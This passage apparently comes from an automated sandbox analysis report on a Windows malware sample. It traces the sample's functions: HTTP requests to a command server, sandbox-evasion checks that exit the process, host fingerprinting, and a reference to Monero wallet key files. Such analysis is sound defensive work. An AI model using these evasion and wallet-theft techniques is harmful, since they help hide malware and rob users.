                  • GetProcAddress.KERNEL32(6E320000,011FCC00), ref: 00B1A6E5
                  • GetProcAddress.KERNEL32(6E320000,011FCCA8), ref: 00B1A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a7cfa14fcb32385896d9d1432287fb87609fd0ef3789fdbe5aaba98e47d3765e
                  • Instruction ID: 917570dc8effb4642cf385c79d7b9d4d4797e15dcdac6720543ad1796c3ff2e9
                  • Opcode Fuzzy Hash: a7cfa14fcb32385896d9d1432287fb87609fd0ef3789fdbe5aaba98e47d3765e
                  • Instruction Fuzzy Hash: 0B62FABD5C0340AFD364DFACED889663BF9F78E601714851AA609C3364D639A841DF72
                  Function 00B06280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 b06280-b0630b call b1a7a0 call b047b0 call b1a740 InternetOpenA StrCmpCA 1040 b06314-b06318 1033->1040 1041 b0630d 1033->1041 1042 b06509-b06525 call b1a7a0 call b1a800 * 2 1040->1042 1043 b0631e-b06342 InternetConnectA 1040->1043 1041->1040 1062 b06528-b0652d 1042->1062 1045 b06348-b0634c 1043->1045 1046 b064ff-b06503 InternetCloseHandle 1043->1046 1048 b0635a 1045->1048 1049 b0634e-b06358 1045->1049 1046->1042 1051 b06364-b06392 HttpOpenRequestA 1048->1051 1049->1051 1053 b064f5-b064f9 InternetCloseHandle 1051->1053 1054 b06398-b0639c 1051->1054 1053->1046 1056 b063c5-b06405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 b0639e-b063bf InternetSetOptionA 1054->1057 1058 b06407-b06427 call b1a740 call b1a800 * 2 1056->1058 1059 b0642c-b0644b call b18940 1056->1059 1057->1056 1058->1062 1067 b064c9-b064e9 call b1a740 call b1a800 * 2 1059->1067 1068 b0644d-b06454 1059->1068 1067->1062 1071 b06456-b06480 InternetReadFile 1068->1071 1072 b064c7-b064ef InternetCloseHandle 1068->1072 1076 b06482-b06489 1071->1076 1077 b0648b 1071->1077 1072->1053 1076->1077 1080 b0648d-b064c5 call b1a9b0 call b1a8a0 call b1a800 1076->1080 1077->1072 1080->1071
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                  • HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B063FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B0646D
                  • InternetCloseHandle.WININET(00000000), ref: 00B064EF
                  • InternetCloseHandle.WININET(00000000), ref: 00B064F9
                  • InternetCloseHandle.WININET(00000000), ref: 00B06503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 20a9763d8c933cb83f1de115ae25f439c531fe716da7e23d3a82b59b9ac23ba1
                  • Instruction ID: d75327ac7681e7151592fc51255ad8071965ebca71fdc33afb02ed217ee3afb3
                  • Opcode Fuzzy Hash: 20a9763d8c933cb83f1de115ae25f439c531fe716da7e23d3a82b59b9ac23ba1
                  • Instruction Fuzzy Hash: 9D716F75A40318ABDB24DFA4DC49BEE7BB8FB44700F508198F109AB2D0DBB46A85CF51
                  Function 00B15510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 b15510-b15577 call b15ad0 call b1a820 * 3 call b1a740 * 4 1106 b1557c-b15583 1090->1106 1107 b15585-b155b6 call b1a820 call b1a7a0 call b01590 call b151f0 1106->1107 1108 b155d7-b1564c call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1106->1108 1124 b155bb-b155d2 call b1a8a0 call b1a800 1107->1124 1134 b15693-b156a9 call b1aad0 StrCmpCA 1108->1134 1138 b1564e-b1568e call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1108->1138 1124->1134 1139 b157dc-b15844 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1134->1139 1140 b156af-b156b6 1134->1140 1138->1134 1270 b15ac3-b15ac6 1139->1270 1143 b157da-b1585f call b1aad0 StrCmpCA 1140->1143 1144 b156bc-b156c3 1140->1144 1163 b15991-b159f9 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1143->1163 1164 b15865-b1586c 1143->1164 1148 b156c5-b15719 call b1a820 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1144->1148 1149 b1571e-b15793 call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 b15795-b157d5 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1149->1249 1163->1270 1170 b15872-b15879 1164->1170 1171 b1598f-b15a14 call b1aad0 StrCmpCA 1164->1171 1179 b158d3-b15948 call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1170->1179 1180 b1587b-b158ce call b1a820 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1170->1180 1200 b15a16-b15a21 Sleep 1171->1200 1201 b15a28-b15a91 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1171->1201 1179->1171 1275 b1594a-b1598a call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1143 1275->1171
                  APIs
                    • Part of subcall function 00B1A820: lstrlen.KERNEL32(00B04F05,?,?,00B04F05,00B20DDE), ref: 00B1A82B
                    • Part of subcall function 00B1A820: lstrcpy.KERNEL32(00B20DDE,00000000), ref: 00B1A885
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B156A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15857
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15228
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15318
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B1532F
                    • Part of subcall function 00B152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B15364
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B15383
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B153AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B1578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00B15A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: e145fed494c38ab1ca6124a4a57ca77c223de945a7c8ad2b8c4fc2b5a81b3648
                  • Instruction ID: f3514a7f82e24bdf7b5c46a32c3ee4c2d96d43cf07396005a42bc9c9ee044cd7
                  • Opcode Fuzzy Hash: e145fed494c38ab1ca6124a4a57ca77c223de945a7c8ad2b8c4fc2b5a81b3648
                  • Instruction Fuzzy Hash: 56E153719112049BCB14FBA4DD92DED73BCAF54310FD085A8B406A6191EF347F8ACBA2
                  Function 00B117A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 b117a0-b117cd call b1aad0 StrCmpCA 1304 b117d7-b117f1 call b1aad0 1301->1304 1305 b117cf-b117d1 ExitProcess 1301->1305 1309 b117f4-b117f8 1304->1309 1310 b119c2-b119cd call b1a800 1309->1310 1311 b117fe-b11811 1309->1311 1313 b11817-b1181a 1311->1313 1314 b1199e-b119bd 1311->1314 1316 b118f1-b11902 StrCmpCA 1313->1316 1317 b11951-b11962 StrCmpCA 1313->1317 1318 b11970-b11981 StrCmpCA 1313->1318 1319 b11913-b11924 StrCmpCA 1313->1319 1320 b11932-b11943 StrCmpCA 1313->1320 1321 b11835-b11844 call b1a820 1313->1321 1322 b1185d-b1186e StrCmpCA 1313->1322 1323 b1187f-b11890 StrCmpCA 1313->1323 1324 b11821-b11830 call b1a820 1313->1324 1325 b11849-b11858 call b1a820 1313->1325 1326 b118ad-b118be StrCmpCA 1313->1326 1327 b118cf-b118e0 StrCmpCA 1313->1327 1328 b1198f-b11999 call b1a820 1313->1328 1314->1309 1348 b11904-b11907 1316->1348 1349 b1190e 1316->1349 1331 b11964-b11967 1317->1331 1332 b1196e 1317->1332 1334 b11983-b11986 1318->1334 1335 b1198d 1318->1335 1350 b11930 1319->1350 1351 b11926-b11929 1319->1351 1329 b11945-b11948 1320->1329 1330 b1194f 1320->1330 1321->1314 1340 b11870-b11873 1322->1340 1341 b1187a 1322->1341 1342 b11892-b1189c 1323->1342 1343 b1189e-b118a1 1323->1343 1324->1314 1325->1314 1344 b118c0-b118c3 1326->1344 1345 b118ca 1326->1345 1346 b118e2-b118e5 1327->1346 1347 b118ec 1327->1347 1328->1314 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 b118a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00B117C5
                  • ExitProcess.KERNEL32 ref: 00B117D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: ba284369763f5c8e7f170a0e9f5834a4d38f0a9a7f8153219f0de7d4e255e722
                  • Instruction ID: 2c2bd892d5b6fc3055c215ca5292b5b0e6ba461ed0be6712b74c705427aa6054
                  • Opcode Fuzzy Hash: ba284369763f5c8e7f170a0e9f5834a4d38f0a9a7f8153219f0de7d4e255e722
                  • Instruction Fuzzy Hash: 6B516CB4A10209EBCB04DFA8D994AFE77F5FF44344F508898E916A7351D770E982CB62
                  Function 00B17500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 b17500-b1754a GetWindowsDirectoryA 1357 b17553-b175c7 GetVolumeInformationA call b18d00 * 3 1356->1357 1358 b1754c 1356->1358 1365 b175d8-b175df 1357->1365 1358->1357 1366 b175e1-b175fa call b18d00 1365->1366 1367 b175fc-b17617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 b17619-b17626 call b1a740 1367->1369 1370 b17628-b17658 wsprintfA call b1a740 1367->1370 1377 b1767e-b1768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B17542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B1760A
                  • wsprintfA.USER32 ref: 00B17640
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 800687fbc9d0446a5cdf75ece57a1115e08710028bf2737f1b8174c257e028bd
                  • Instruction ID: 7fb4c7de2a6060303b86d462446f5d802ded93d90a0a5a5ebb08b74a670f403d
                  • Opcode Fuzzy Hash: 800687fbc9d0446a5cdf75ece57a1115e08710028bf2737f1b8174c257e028bd
                  • Instruction Fuzzy Hash: ED4182B5D44358ABDB10DF98DC85BEEBBB8EF18700F100199F509A7280DB746A84CBA5
                  Function 00B169F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F06C0), ref: 00B198A1
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0708), ref: 00B198BA
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0720), ref: 00B198D2
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F07F8), ref: 00B198EA
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0558), ref: 00B19903
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F8950), ref: 00B1991B
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E6580), ref: 00B19933
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E65A0), ref: 00B1994C
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0570), ref: 00B19964
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0588), ref: 00B1997C
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05A0), ref: 00B19995
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05B8), ref: 00B199AD
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E6500), ref: 00B199C5
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05D0), ref: 00B199DE
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B011D0: ExitProcess.KERNEL32 ref: 00B01211
                    • Part of subcall function 00B01160: GetSystemInfo.KERNEL32(?), ref: 00B0116A
                    • Part of subcall function 00B01160: ExitProcess.KERNEL32 ref: 00B0117E
                    • Part of subcall function 00B01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B0112B
                    • Part of subcall function 00B01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01132
                    • Part of subcall function 00B01110: ExitProcess.KERNEL32 ref: 00B01143
                    • Part of subcall function 00B01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B0123E
                    • Part of subcall function 00B01220: __aulldiv.LIBCMT ref: 00B01258
                    • Part of subcall function 00B01220: __aulldiv.LIBCMT ref: 00B01266
                    • Part of subcall function 00B01220: ExitProcess.KERNEL32 ref: 00B01294
                    • Part of subcall function 00B16770: GetUserDefaultLangID.KERNEL32 ref: 00B16774
                    • Part of subcall function 00B01190: ExitProcess.KERNEL32 ref: 00B011C6
                    • Part of subcall function 00B17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                    • Part of subcall function 00B17850: RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                    • Part of subcall function 00B17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                    • Part of subcall function 00B178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                    • Part of subcall function 00B178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                    • Part of subcall function 00B178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00B16AF9
                  • Sleep.KERNEL32(00001770), ref: 00B16B04
                  • CloseHandle.KERNEL32(?,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16B1A
                  • ExitProcess.KERNEL32 ref: 00B16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: b347cc711a87abe8383581933181c2b46d41547f5d5cdfe6c73abb95989531d7
                  • Instruction ID: 956be6ae0f48c9bfa05f283d71591c456d567ef4fe0235bd8b5aaa182253750c
                  • Opcode Fuzzy Hash: b347cc711a87abe8383581933181c2b46d41547f5d5cdfe6c73abb95989531d7
                  • Instruction Fuzzy Hash: 74311C71941208ABDB08FBF4DC56BEE77F8AF14350F904598F202B21D2DF706986C6A2
                  Function 00B01220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
